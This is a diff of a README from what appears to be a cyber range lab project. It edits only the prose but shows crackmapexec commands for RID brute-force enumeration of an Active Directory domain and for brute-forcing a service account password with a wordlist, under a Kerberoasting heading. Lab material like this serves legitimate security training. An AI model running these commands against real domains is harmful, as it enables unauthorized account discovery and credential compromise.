2dukes/Cyber-Range-Framework/project/ad/README.md

 # Kerberoasting (Needs Domain Account)

-At first, enumerate AD objects with:
+First, enumerate AD objects with the following:

 `crackmapexec smb dc01.xyz.com -u USERNAME -p PASSWORD -d xyz.com --rid-brute`

 ### Brute-forcing Passwords of ServiceAccounts (Only one Kerberoastable)

-With the information of the existing service accounts we can try to brute-force the service accounts but only one will be likely to succeed.
+With the information on the existing service accounts, we can brute-force the service accounts, but only one will likely succeed.

 ```sh
 crackmapexec smb dc01.xyz.com -u http_svc$ -p passwords.txt